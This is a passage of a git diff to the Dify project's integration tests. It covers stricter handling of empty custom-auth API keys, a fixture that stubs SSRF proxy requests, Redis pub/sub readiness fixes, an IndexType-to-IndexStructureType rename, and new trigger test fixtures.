b/api/tests/integration_tests/workflow/nodes/test_http.py index e75258a2a2..d814da8ec7 100644 --- a/api/tests/integration_tests/workflow/nodes/test_http.py +++ b/api/tests/integration_tests/workflow/nodes/test_http.py @@ -6,6 +6,7 @@ import pytest from core.app.entities.app_invoke_entities import InvokeFrom from core.workflow.entities import GraphInitParams +from core.workflow.enums import WorkflowNodeExecutionStatus from core.workflow.graph import Graph from core.workflow.nodes.http_request.node import HttpRequestNode from core.workflow.nodes.node_factory import DifyNodeFactory @@ -169,13 +170,14 @@ def test_custom_authorization_header(setup_http_mock): @pytest.mark.parametrize("setup_http_mock", [["none"]], indirect=True) -def test_custom_auth_with_empty_api_key_does_not_set_header(setup_http_mock): - """Test: In custom authentication mode, when the api_key is empty, no header should be set.""" +def test_custom_auth_with_empty_api_key_raises_error(setup_http_mock): + """Test: In custom authentication mode, when the api_key is empty, AuthorizationConfigError should be raised.""" from core.workflow.nodes.http_request.entities import ( HttpRequestNodeAuthorization, HttpRequestNodeData, HttpRequestNodeTimeout, ) + from core.workflow.nodes.http_request.exc import AuthorizationConfigError from core.workflow.nodes.http_request.executor import Executor from core.workflow.runtime import VariablePool from core.workflow.system_variable import SystemVariable @@ -208,16 +210,13 @@ def test_custom_auth_with_empty_api_key_does_not_set_header(setup_http_mock): ssl_verify=True, ) - # Create executor - executor = Executor( - node_data=node_data, timeout=HttpRequestNodeTimeout(connect=10, read=30, write=10), variable_pool=variable_pool - ) - - # Get assembled headers - headers = executor._assembling_headers() - - # When api_key is empty, the custom header should NOT be set - assert "X-Custom-Auth" not in headers + # Create executor should raise AuthorizationConfigError + with pytest.raises(AuthorizationConfigError, match="API key is required"): + Executor( + node_data=node_data, + timeout=HttpRequestNodeTimeout(connect=10, read=30, write=10), + variable_pool=variable_pool, + ) @pytest.mark.parametrize("setup_http_mock", [["none"]], indirect=True) @@ -305,9 +304,10 @@ def test_basic_authorization_with_custom_header_ignored(setup_http_mock): @pytest.mark.parametrize("setup_http_mock", [["none"]], indirect=True) def test_custom_authorization_with_empty_api_key(setup_http_mock): """ - Test that custom authorization doesn't set header when api_key is empty. - This test verifies the fix for issue #23554. + Test that custom authorization raises error when api_key is empty. + This test verifies the fix for issue #21830. """ + node = init_http_node( config={ "id": "1", @@ -333,11 +333,10 @@ def test_custom_authorization_with_empty_api_key(setup_http_mock): ) result = node._run() - assert result.process_data is not None - data = result.process_data.get("request", "") - - # Custom header should NOT be set when api_key is empty - assert "X-Custom-Auth:" not in data + # Should fail with AuthorizationConfigError + assert result.status == WorkflowNodeExecutionStatus.FAILED + assert "API key is required" in result.error + assert result.error_type == "AuthorizationConfigError" @pytest.mark.parametrize("setup_http_mock", [["none"]], indirect=True) diff --git a/api/tests/test_containers_integration_tests/conftest.py b/api/tests/test_containers_integration_tests/conftest.py index 180ee1c963..d6d2d30305 100644 --- a/api/tests/test_containers_integration_tests/conftest.py +++ b/api/tests/test_containers_integration_tests/conftest.py @@ -138,9 +138,9 @@ class DifyTestContainers: logger.warning("Failed to create plugin database: %s", e) # Set up storage environment variables - os.environ["STORAGE_TYPE"] = "opendal" - os.environ["OPENDAL_SCHEME"] = "fs" - os.environ["OPENDAL_FS_ROOT"] = "storage" + os.environ.setdefault("STORAGE_TYPE", "opendal") + os.environ.setdefault("OPENDAL_SCHEME", "fs") + os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage") # Start Redis container for caching and session management # Redis is used for storing session data, cache entries, and temporary data @@ -348,6 +348,13 @@ def _create_app_with_containers() -> Flask: """ logger.info("Creating Flask application with test container configuration...") + # Ensure Redis client reconnects to the containerized Redis (no auth) + from extensions import ext_redis + + ext_redis.redis_client._client = None + os.environ["REDIS_USERNAME"] = "" + os.environ["REDIS_PASSWORD"] = "" + # Re-create the config after environment variables have been set from configs import dify_config @@ -486,3 +493,29 @@ def db_session_with_containers(flask_app_with_containers) -> Generator[Session, finally: session.close() logger.debug("Database session closed") + + +@pytest.fixture(scope="package", autouse=True) +def mock_ssrf_proxy_requests(): + """ + Avoid outbound network during containerized tests by stubbing SSRF proxy helpers. + """ + + from unittest.mock import patch + + import httpx + + def _fake_request(method, url, **kwargs): + request = httpx.Request(method=method, url=url) + return httpx.Response(200, request=request, content=b"") + + with ( + patch("core.helper.ssrf_proxy.make_request", side_effect=_fake_request), + patch("core.helper.ssrf_proxy.get", side_effect=lambda url, **kw: _fake_request("GET", url, **kw)), + patch("core.helper.ssrf_proxy.post", side_effect=lambda url, **kw: _fake_request("POST", url, **kw)), + patch("core.helper.ssrf_proxy.put", side_effect=lambda url, **kw: _fake_request("PUT", url, **kw)), + patch("core.helper.ssrf_proxy.patch", side_effect=lambda url, **kw: _fake_request("PATCH", url, **kw)), + patch("core.helper.ssrf_proxy.delete", side_effect=lambda url, **kw: _fake_request("DELETE", url, **kw)), + patch("core.helper.ssrf_proxy.head", side_effect=lambda url, **kw: _fake_request("HEAD", url, **kw)), + ): + yield diff --git a/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py b/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py index ea61747ba2..d612e70910 100644 --- a/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py +++ b/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py @@ -113,16 +113,31 @@ class TestShardedRedisBroadcastChannelIntegration: topic = broadcast_channel.topic(topic_name) producer = topic.as_producer() subscriptions = [topic.subscribe() for _ in range(subscriber_count)] + ready_events = [threading.Event() for _ in range(subscriber_count)] def producer_thread(): - time.sleep(0.2) # Allow all subscribers to connect + deadline = time.time() + 5.0 + for ev in ready_events: + remaining = deadline - time.time() + if remaining <= 0: + break + if not ev.wait(timeout=max(0.0, remaining)): + pytest.fail("subscriber did not become ready before publish deadline") producer.publish(message) time.sleep(0.2) for sub in subscriptions: sub.close() - def consumer_thread(subscription: Subscription) -> list[bytes]: + def consumer_thread(subscription: Subscription, ready_event: threading.Event) -> list[bytes]: received_msgs = [] + # Prime subscription so the underlying Pub/Sub listener thread starts before publishing + try: + _ = subscription.receive(0.01) + except SubscriptionClosedError: + return received_msgs + finally: + ready_event.set() + while True: try: msg = subscription.receive(0.1) @@ -137,7 +152,10 @@ class TestShardedRedisBroadcastChannelIntegration: with ThreadPoolExecutor(max_workers=subscriber_count + 1) as executor: producer_future = executor.submit(producer_thread) - consumer_futures = [executor.submit(consumer_thread, subscription) for subscription in subscriptions] + consumer_futures = [ + executor.submit(consumer_thread, subscription, ready_events[idx]) + for idx, subscription in enumerate(subscriptions) + ] producer_future.result(timeout=10.0) msgs_by_consumers = [] @@ -240,8 +258,7 @@ class TestShardedRedisBroadcastChannelIntegration: for future in as_completed(producer_futures, timeout=30.0): sent_msgs.update(future.result()) - subscription.close() - consumer_received_msgs = consumer_future.result(timeout=30.0) + consumer_received_msgs = consumer_future.result(timeout=60.0) assert sent_msgs == consumer_received_msgs diff --git a/api/tests/test_containers_integration_tests/services/test_webhook_service.py b/api/tests/test_containers_integration_tests/services/test_webhook_service.py index 8328db950c..e3431fd382 100644 --- a/api/tests/test_containers_integration_tests/services/test_webhook_service.py +++ b/api/tests/test_containers_integration_tests/services/test_webhook_service.py @@ -233,7 +233,7 @@ class TestWebhookService: "/webhook", method="POST", headers={"Content-Type": "multipart/form-data"}, - data={"message": "test", "upload": file_storage}, + data={"message": "test", "file": file_storage}, ): webhook_trigger = MagicMock() webhook_trigger.tenant_id = "test_tenant" @@ -242,7 +242,7 @@ class TestWebhookService: assert webhook_data["method"] == "POST" assert webhook_data["body"]["message"] == "test" - assert "upload" in webhook_data["files"] + assert "file" in webhook_data["files"] # Verify file processing was called mock_external_dependencies["tool_file_manager"].assert_called_once() @@ -414,7 +414,7 @@ class TestWebhookService: "data": { "method": "post", "content_type": "multipart/form-data", - "body": [{"name": "upload", "type": "file", "required": True}], + "body": [{"name": "file", "type": "file", "required": True}], } } diff --git a/api/tests/test_containers_integration_tests/services/tools/test_api_tools_manage_service.py b/api/tests/test_containers_integration_tests/services/tools/test_api_tools_manage_service.py index 0871467a05..2ff71ea6ea 100644 --- a/api/tests/test_containers_integration_tests/services/tools/test_api_tools_manage_service.py +++ b/api/tests/test_containers_integration_tests/services/tools/test_api_tools_manage_service.py @@ -2,7 +2,9 @@ from unittest.mock import patch import pytest from faker import Faker +from pydantic import TypeAdapter, ValidationError +from core.tools.entities.tool_entities import ApiProviderSchemaType from models import Account, Tenant from models.tools import ApiToolProvider from services.tools.api_tools_manage_service import ApiToolManageService @@ -298,7 +300,7 @@ class TestApiToolManageService: provider_name = fake.company() icon = {"type": "emoji", "value": "🔧"} credentials = {"auth_type": "none", "api_key_header": "X-API-Key", "api_key_value": ""} - schema_type = "openapi" + schema_type = ApiProviderSchemaType.OPENAPI schema = self._create_test_openapi_schema() privacy_policy = "https://example.com/privacy" custom_disclaimer = "Custom disclaimer text" @@ -364,7 +366,7 @@ class TestApiToolManageService: provider_name = fake.company() icon = {"type": "emoji", "value": "🔧"} credentials = {"auth_type": "none"} - schema_type = "openapi" + schema_type = ApiProviderSchemaType.OPENAPI schema = self._create_test_openapi_schema() privacy_policy = "https://example.com/privacy" custom_disclaimer = "Custom disclaimer text" @@ -428,21 +430,10 @@ class TestApiToolManageService: labels = ["test"] # Act & Assert: Try to create provider with invalid schema type - with pytest.raises(ValueError) as exc_info: - ApiToolManageService.create_api_tool_provider( - user_id=account.id, - tenant_id=tenant.id, - provider_name=provider_name, - icon=icon, - credentials=credentials, - schema_type=schema_type, - schema=schema, - privacy_policy=privacy_policy, - custom_disclaimer=custom_disclaimer, - labels=labels, - ) + with pytest.raises(ValidationError) as exc_info: + TypeAdapter(ApiProviderSchemaType).validate_python(schema_type) - assert "invalid schema type" in str(exc_info.value) + assert "validation error" in str(exc_info.value) def test_create_api_tool_provider_missing_auth_type( self, flask_req_ctx_with_containers, db_session_with_containers, mock_external_service_dependencies @@ -464,7 +455,7 @@ class TestApiToolManageService: provider_name = fake.company() icon = {"type": "emoji", "value": "🔧"} credentials = {} # Missing auth_type - schema_type = "openapi" + schema_type = ApiProviderSchemaType.OPENAPI schema = self._create_test_openapi_schema() privacy_policy = "https://example.com/privacy" custom_disclaimer = "Custom disclaimer text" @@ -507,7 +498,7 @@ class TestApiToolManageService: provider_name = fake.company() icon = {"type": "emoji", "value": "🔑"} credentials = {"auth_type": "api_key", "api_key_header": "X-API-Key", "api_key_value": fake.uuid4()} - schema_type = "openapi" + schema_type = ApiProviderSchemaType.OPENAPI schema = self._create_test_openapi_schema() privacy_policy = "https://example.com/privacy" custom_disclaimer = "Custom disclaimer text" diff --git a/api/tests/test_containers_integration_tests/services/tools/test_mcp_tools_manage_service.py b/api/tests/test_containers_integration_tests/services/tools/test_mcp_tools_manage_service.py index 8c190762cf..6cae83ac37 100644 --- a/api/tests/test_containers_integration_tests/services/tools/test_mcp_tools_manage_service.py +++ b/api/tests/test_containers_integration_tests/services/tools/test_mcp_tools_manage_service.py @@ -1308,18 +1308,17 @@ class TestMCPToolManageService: type("MockTool", (), {"model_dump": lambda self: {"name": "test_tool_2", "description": "Test tool 2"}})(), ] - with patch("services.tools.mcp_tools_manage_service.MCPClientWithAuthRetry") as mock_mcp_client: + with patch("core.mcp.mcp_client.MCPClient") as mock_mcp_client: # Setup mock client mock_client_instance = mock_mcp_client.return_value.__enter__.return_value mock_client_instance.list_tools.return_value = mock_tools # Act: Execute the method under test - from extensions.ext_database import db - - service = MCPToolManageService(db.session()) - result = service._reconnect_provider( + result = MCPToolManageService._reconnect_with_url( server_url="https://example.com/mcp", - provider=mcp_provider, + headers={"X-Test": "1"}, + timeout=mcp_provider.timeout, + sse_read_timeout=mcp_provider.sse_read_timeout, ) # Assert: Verify the expected outcomes @@ -1337,8 +1336,12 @@ class TestMCPToolManageService: assert tools_data[1]["name"] == "test_tool_2" # Verify mock interactions - provider_entity = mcp_provider.to_entity() - mock_mcp_client.assert_called_once() + mock_mcp_client.assert_called_once_with( + server_url="https://example.com/mcp", + headers={"X-Test": "1"}, + timeout=mcp_provider.timeout, + sse_read_timeout=mcp_provider.sse_read_timeout, + ) def test_re_connect_mcp_provider_auth_error(self, db_session_with_containers, mock_external_service_dependencies): """ @@ -1361,19 +1364,18 @@ class TestMCPToolManageService: ) # Mock MCPClient to raise authentication error - with patch("services.tools.mcp_tools_manage_service.MCPClientWithAuthRetry") as mock_mcp_client: + with patch("core.mcp.mcp_client.MCPClient") as mock_mcp_client: from core.mcp.error import MCPAuthError mock_client_instance = mock_mcp_client.return_value.__enter__.return_value mock_client_instance.list_tools.side_effect = MCPAuthError("Authentication required") # Act: Execute the method under test - from extensions.ext_database import db - - service = MCPToolManageService(db.session()) - result = service._reconnect_provider( + result = MCPToolManageService._reconnect_with_url( server_url="https://example.com/mcp", - provider=mcp_provider, + headers={}, + timeout=mcp_provider.timeout, + sse_read_timeout=mcp_provider.sse_read_timeout, ) # Assert: Verify the expected outcomes @@ -1404,18 +1406,17 @@ class TestMCPToolManageService: ) # Mock MCPClient to raise connection error - with patch("services.tools.mcp_tools_manage_service.MCPClientWithAuthRetry") as mock_mcp_client: + with patch("core.mcp.mcp_client.MCPClient") as mock_mcp_client: from core.mcp.error import MCPError mock_client_instance = mock_mcp_client.return_value.__enter__.return_value mock_client_instance.list_tools.side_effect = MCPError("Connection failed") # Act & Assert: Verify proper error handling - from extensions.ext_database import db - - service = MCPToolManageService(db.session()) with pytest.raises(ValueError, match="Failed to re-connect MCP server: Connection failed"): - service._reconnect_provider( + MCPToolManageService._reconnect_with_url( server_url="https://example.com/mcp", - provider=mcp_provider, + headers={"X-Test": "1"}, + timeout=mcp_provider.timeout, + sse_read_timeout=mcp_provider.sse_read_timeout, ) diff --git a/api/tests/test_containers_integration_tests/tasks/test_add_document_to_index_task.py b/api/tests/test_containers_integration_tests/tasks/test_add_document_to_index_task.py index 9478bb9ddb..088d6ba6ba 100644 --- a/api/tests/test_containers_integration_tests/tasks/test_add_document_to_index_task.py +++ b/api/tests/test_containers_integration_tests/tasks/test_add_document_to_index_task.py @@ -3,7 +3,7 @@ from unittest.mock import MagicMock, patch import pytest from faker import Faker -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.index_type import IndexStructureType from extensions.ext_database import db from extensions.ext_redis import redis_client from models import Account, Tenant, TenantAccountJoin, TenantAccountRole @@ -95,7 +95,7 @@ class TestAddDocumentToIndexTask: created_by=account.id, indexing_status="completed", enabled=True, - doc_form=IndexType.PARAGRAPH_INDEX, + doc_form=IndexStructureType.PARAGRAPH_INDEX, ) db.session.add(document) db.session.commit() @@ -172,7 +172,9 @@ class TestAddDocumentToIndexTask: # Assert: Verify the expected outcomes # Verify index processor was called correctly - mock_external_service_dependencies["index_processor_factory"].assert_called_once_with(IndexType.PARAGRAPH_INDEX) + mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( + IndexStructureType.PARAGRAPH_INDEX + ) mock_external_service_dependencies["index_processor"].load.assert_called_once() # Verify database state changes @@ -204,7 +206,7 @@ class TestAddDocumentToIndexTask: ) # Update document to use different index type - document.doc_form = IndexType.QA_INDEX + document.doc_form = IndexStructureType.QA_INDEX db.session.commit() # Refresh dataset to ensure doc_form property reflects the updated document @@ -221,7 +223,9 @@ class TestAddDocumentToIndexTask: add_document_to_index_task(document.id) # Assert: Verify different index type handling - mock_external_service_dependencies["index_processor_factory"].assert_called_once_with(IndexType.QA_INDEX) + mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( + IndexStructureType.QA_INDEX + ) mock_external_service_dependencies["index_processor"].load.assert_called_once() # Verify the load method was called with correct parameters @@ -360,7 +364,7 @@ class TestAddDocumentToIndexTask: ) # Update document to use parent-child index type - document.doc_form = IndexType.PARENT_CHILD_INDEX + document.doc_form = IndexStructureType.PARENT_CHILD_INDEX db.session.commit() # Refresh dataset to ensure doc_form property reflects the updated document @@ -391,7 +395,7 @@ class TestAddDocumentToIndexTask: # Assert: Verify parent-child index processing mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( - IndexType.PARENT_CHILD_INDEX + IndexStructureType.PARENT_CHILD_INDEX ) mock_external_service_dependencies["index_processor"].load.assert_called_once() @@ -465,8 +469,10 @@ class TestAddDocumentToIndexTask: # Act: Execute the task add_document_to_index_task(document.id) - # Assert: Verify index processing occurred with all completed segments - mock_external_service_dependencies["index_processor_factory"].assert_called_once_with(IndexType.PARAGRAPH_INDEX) + # Assert: Verify index processing occurred but with empty documents list + mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( + IndexStructureType.PARAGRAPH_INDEX + ) mock_external_service_dependencies["index_processor"].load.assert_called_once() # Verify the load method was called with all completed segments @@ -532,7 +538,9 @@ class TestAddDocumentToIndexTask: assert len(remaining_logs) == 0 # Verify index processing occurred normally - mock_external_service_dependencies["index_processor_factory"].assert_called_once_with(IndexType.PARAGRAPH_INDEX) + mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( + IndexStructureType.PARAGRAPH_INDEX + ) mock_external_service_dependencies["index_processor"].load.assert_called_once() # Verify segments were enabled @@ -699,7 +707,9 @@ class TestAddDocumentToIndexTask: add_document_to_index_task(document.id) # Assert: Verify only eligible segments were processed - mock_external_service_dependencies["index_processor_factory"].assert_called_once_with(IndexType.PARAGRAPH_INDEX) + mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( + IndexStructureType.PARAGRAPH_INDEX + ) mock_external_service_dependencies["index_processor"].load.assert_called_once() # Verify the load method was called with correct parameters diff --git a/api/tests/test_containers_integration_tests/tasks/test_delete_segment_from_index_task.py b/api/tests/test_containers_integration_tests/tasks/test_delete_segment_from_index_task.py index 94e9b76965..37d886f569 100644 --- a/api/tests/test_containers_integration_tests/tasks/test_delete_segment_from_index_task.py +++ b/api/tests/test_containers_integration_tests/tasks/test_delete_segment_from_index_task.py @@ -12,7 +12,7 @@ from unittest.mock import MagicMock, patch from faker import Faker -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.index_type import IndexStructureType from models import Account, Dataset, Document, DocumentSegment, Tenant from tasks.delete_segment_from_index_task import delete_segment_from_index_task @@ -164,7 +164,7 @@ class TestDeleteSegmentFromIndexTask: document.updated_at = fake.date_time_this_year() document.doc_type = kwargs.get("doc_type", "text") document.doc_metadata = kwargs.get("doc_metadata", {}) - document.doc_form = kwargs.get("doc_form", IndexType.PARAGRAPH_INDEX) + document.doc_form = kwargs.get("doc_form", IndexStructureType.PARAGRAPH_INDEX) document.doc_language = kwargs.get("doc_language", "en") db_session_with_containers.add(document) @@ -244,8 +244,11 @@ class TestDeleteSegmentFromIndexTask: mock_processor = MagicMock() mock_index_processor_factory.return_value.init_index_processor.return_value = mock_processor + # Extract segment IDs for the task + segment_ids = [segment.id for segment in segments] + # Execute the task - result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id, segment_ids) # Verify the task completed successfully assert result is None # Task should return None on success @@ -279,7 +282,7 @@ class TestDeleteSegmentFromIndexTask: index_node_ids = [f"node_{fake.uuid4()}" for _ in range(3)] # Execute the task with non-existent dataset - result = delete_segment_from_index_task(index_node_ids, non_existent_dataset_id, non_existent_document_id) + result = delete_segment_from_index_task(index_node_ids, non_existent_dataset_id, non_existent_document_id, []) # Verify the task completed without exceptions assert result is None # Task should return None when dataset not found @@ -305,7 +308,7 @@ class TestDeleteSegmentFromIndexTask: index_node_ids = [f"node_{fake.uuid4()}" for _ in range(3)] # Execute the task with non-existent document - result = delete_segment_from_index_task(index_node_ids, dataset.id, non_existent_document_id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, non_existent_document_id, []) # Verify the task completed without exceptions assert result is None # Task should return None when document not found @@ -330,9 +333,10 @@ class TestDeleteSegmentFromIndexTask: segments = self._create_test_document_segments(db_session_with_containers, document, account, 3, fake) index_node_ids = [segment.index_node_id for segment in segments] + segment_ids = [segment.id for segment in segments] # Execute the task with disabled document - result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id, segment_ids) # Verify the task completed without exceptions assert result is None # Task should return None when document is disabled @@ -357,9 +361,10 @@ class TestDeleteSegmentFromIndexTask: segments = self._create_test_document_segments(db_session_with_containers, document, account, 3, fake) index_node_ids = [segment.index_node_id for segment in segments] + segment_ids = [segment.id for segment in segments] # Execute the task with archived document - result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id, segment_ids) # Verify the task completed without exceptions assert result is None # Task should return None when document is archived @@ -386,9 +391,10 @@ class TestDeleteSegmentFromIndexTask: segments = self._create_test_document_segments(db_session_with_containers, document, account, 3, fake) index_node_ids = [segment.index_node_id for segment in segments] + segment_ids = [segment.id for segment in segments] # Execute the task with incomplete indexing - result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id, segment_ids) # Verify the task completed without exceptions assert result is None # Task should return None when indexing is not completed @@ -409,7 +415,11 @@ class TestDeleteSegmentFromIndexTask: fake = Faker() # Test different document forms - document_forms = [IndexType.PARAGRAPH_INDEX, IndexType.QA_INDEX, IndexType.PARENT_CHILD_INDEX] + document_forms = [ + IndexStructureType.PARAGRAPH_INDEX, + IndexStructureType.QA_INDEX, + IndexStructureType.PARENT_CHILD_INDEX, + ] for doc_form in document_forms: # Create test data for each document form @@ -420,13 +430,14 @@ class TestDeleteSegmentFromIndexTask: segments = self._create_test_document_segments(db_session_with_containers, document, account, 2, fake) index_node_ids = [segment.index_node_id for segment in segments] + segment_ids = [segment.id for segment in segments] # Mock the index processor mock_processor = MagicMock() mock_index_processor_factory.return_value.init_index_processor.return_value = mock_processor # Execute the task - result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id, segment_ids) # Verify the task completed successfully assert result is None @@ -469,6 +480,7 @@ class TestDeleteSegmentFromIndexTask: segments = self._create_test_document_segments(db_session_with_containers, document, account, 3, fake) index_node_ids = [segment.index_node_id for segment in segments] + segment_ids = [segment.id for segment in segments] # Mock the index processor to raise an exception mock_processor = MagicMock() @@ -476,7 +488,7 @@ class TestDeleteSegmentFromIndexTask: mock_index_processor_factory.return_value.init_index_processor.return_value = mock_processor # Execute the task - should not raise exception - result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id, segment_ids) # Verify the task completed without raising exceptions assert result is None # Task should return None even when exceptions occur @@ -518,7 +530,7 @@ class TestDeleteSegmentFromIndexTask: mock_index_processor_factory.return_value.init_index_processor.return_value = mock_processor # Execute the task - result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id, []) # Verify the task completed successfully assert result is None @@ -555,13 +567,14 @@ class TestDeleteSegmentFromIndexTask: # Create large number of segments segments = self._create_test_document_segments(db_session_with_containers, document, account, 50, fake) index_node_ids = [segment.index_node_id for segment in segments] + segment_ids = [segment.id for segment in segments] # Mock the index processor mock_processor = MagicMock() mock_index_processor_factory.return_value.init_index_processor.return_value = mock_processor # Execute the task - result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id, segment_ids) # Verify the task completed successfully assert result is None diff --git a/api/tests/test_containers_integration_tests/tasks/test_enable_segments_to_index_task.py b/api/tests/test_containers_integration_tests/tasks/test_enable_segments_to_index_task.py index 798fe091ab..b738646736 100644 --- a/api/tests/test_containers_integration_tests/tasks/test_enable_segments_to_index_task.py +++ b/api/tests/test_containers_integration_tests/tasks/test_enable_segments_to_index_task.py @@ -3,7 +3,7 @@ from unittest.mock import MagicMock, patch import pytest from faker import Faker -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.index_type import IndexStructureType from extensions.ext_database import db from extensions.ext_redis import redis_client from models.account import Account, Tenant, TenantAccountJoin, TenantAccountRole @@ -95,7 +95,7 @@ class TestEnableSegmentsToIndexTask: created_by=account.id, indexing_status="completed", enabled=True, - doc_form=IndexType.PARAGRAPH_INDEX, + doc_form=IndexStructureType.PARAGRAPH_INDEX, ) db.session.add(document) db.session.commit() @@ -166,7 +166,7 @@ class TestEnableSegmentsToIndexTask: ) # Update document to use different index type - document.doc_form = IndexType.QA_INDEX + document.doc_form = IndexStructureType.QA_INDEX db.session.commit() # Refresh dataset to ensure doc_form property reflects the updated document @@ -185,7 +185,9 @@ class TestEnableSegmentsToIndexTask: enable_segments_to_index_task(segment_ids, dataset.id, document.id) # Assert: Verify different index type handling - mock_external_service_dependencies["index_processor_factory"].assert_called_once_with(IndexType.QA_INDEX) + mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( + IndexStructureType.QA_INDEX + ) mock_external_service_dependencies["index_processor"].load.assert_called_once() # Verify the load method was called with correct parameters @@ -328,7 +330,9 @@ class TestEnableSegmentsToIndexTask: enable_segments_to_index_task(non_existent_segment_ids, dataset.id, document.id) # Assert: Verify index processor was created but load was not called - mock_external_service_dependencies["index_processor_factory"].assert_called_once_with(IndexType.PARAGRAPH_INDEX) + mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( + IndexStructureType.PARAGRAPH_INDEX + ) mock_external_service_dependencies["index_processor"].load.assert_not_called() def test_enable_segments_to_index_with_parent_child_structure( @@ -350,7 +354,7 @@ class TestEnableSegmentsToIndexTask: ) # Update document to use parent-child index type - document.doc_form = IndexType.PARENT_CHILD_INDEX + document.doc_form = IndexStructureType.PARENT_CHILD_INDEX db.session.commit() # Refresh dataset to ensure doc_form property reflects the updated document @@ -383,7 +387,7 @@ class TestEnableSegmentsToIndexTask: # Assert: Verify parent-child index processing mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( - IndexType.PARENT_CHILD_INDEX + IndexStructureType.PARENT_CHILD_INDEX ) mock_external_service_dependencies["index_processor"].load.assert_called_once() diff --git a/api/tests/test_containers_integration_tests/trigger/__init__.py b/api/tests/test_containers_integration_tests/trigger/__init__.py new file mode 100644 index 0000000000..8b13789179 --- /dev/null +++ b/api/tests/test_containers_integration_tests/trigger/__init__.py @@ -0,0 +1 @@ + diff --git a/api/tests/test_containers_integration_tests/trigger/conftest.py b/api/tests/test_containers_integration_tests/trigger/conftest.py new file mode 100644 index 0000000000..9c1fd5e0ec --- /dev/null +++ b/api/tests/test_containers_integration_tests/trigger/conftest.py @@ -0,0 +1,182 @@ +""" +Fixtures for trigger integration tests. + +This module provides fixtures for creating test data (tenant, account, app) +and mock objects used across trigger-related tests. +""" + +from __future__ import annotations + +from collections.abc import Generator +from typing import Any + +import pytest +from sqlalchemy.orm import Session + +from models.account import Account, Tenant, TenantAccountJoin, TenantAccountRole +from models.model import App + + +@pytest.fixture +def tenant_and_account(db_session_with_containers: Session) -> Generator[tuple[Tenant, Account], None, None]: + """ + Create a tenant and account for testing. + + This fixture creates a tenant, account, and their association, + then cleans up after the test completes. + + Yields: + tuple[Tenant, Account]: The created tenant and account + """ + tenant = Tenant(name="trigger-e2e") + account = Account(name="tester", email="tester@example.com", interface_language="en-US") + db_session_with_containers.add_all([tenant, account]) + db_session_with_containers.commit() + + join = TenantAccountJoin(tenant_id=tenant.id, account_id=account.id, role=TenantAccountRole.OWNER.value) + db_session_with_containers.add(join) + db_session_with_containers.commit() + + yield tenant, account + + # Cleanup + db_session_with_containers.query(TenantAccountJoin).filter_by(tenant_id=tenant.id).delete() + db_session_with_containers.query(Account).filter_by(id=account.id).delete() + db_session_with_containers.query(Tenant).filter_by(id=tenant.id).delete() + db_session_with_containers.commit() + + +@pytest.fixture +def app_model( + db_session_with_containers: Session, tenant_and_account: tuple[Tenant, Account] +) -> Generator[App, None, None]: + """ + Create an app for testing. + + This fixture creates a workflow app associated with the tenant and account, + then cleans up after the test completes. + + Yields: + App: The created app + """ + tenant, account = tenant_and_account + app = App( + tenant_id=tenant.id, + name="trigger-app", + description="trigger e2e", + mode="workflow", + icon_type="emoji", + icon="robot", + icon_background="#FFEAD5", + enable_site=True, + enable_api=True, + api_rpm=100, + api_rph=1000, + is_demo=False, + is_public=False, + is_universal=False, + created_by=account.id, + ) + db_session_with_containers.add(app) + db_session_with_containers.commit() + + yield app + + # Cleanup - delete related records first + from models.trigger import ( + AppTrigger, + TriggerSubscription, + WorkflowPluginTrigger, + WorkflowSchedulePlan, + WorkflowTriggerLog, + WorkflowWebhookTrigger, + ) + from models.workflow import Workflow + + db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app.id).delete() + db_session_with_containers.query(WorkflowSchedulePlan).filter_by(app_id=app.id).delete() + db_session_with_containers.query(WorkflowWebhookTrigger).filter_by(app_id=app.id).delete() + db_session_with_containers.query(WorkflowPluginTrigger).filter_by(app_id=app.id).delete() + db_session_with_containers.query(AppTrigger).filter_by(app_id=app.id).delete() + db_session_with_containers.query(TriggerSubscription).filter_by(tenant_id=tenant.id).delete() + db_session_with_containers.query(Workflow).filter_by(app_id=app.id).delete() + db_session_with_containers.query(App).filter_by(id=app.id).delete() + db_session_with_containers.commit() + + +class MockCeleryGroup: + """Mock for celery group() function that collects dispatched tasks.""" + + def __init__(self) -> None: + self.collected: list[dict[str, Any]] = [] + self._applied = False + + def __call__(self, items: Any) -> MockCeleryGroup: + self.collected = list(items) + return self + + def apply_async(self) -> None: + self._applied = True + + @property + def applied(self) -> bool: + return self._applied + + +class MockCelerySignature: + """Mock for celery task signature that returns task info dict.""" + + def s(self, schedule_id: str) -> dict[str, str]: + return {"schedule_id": schedule_id} + + +@pytest.fixture +def mock_celery_group() -> MockCeleryGroup: + 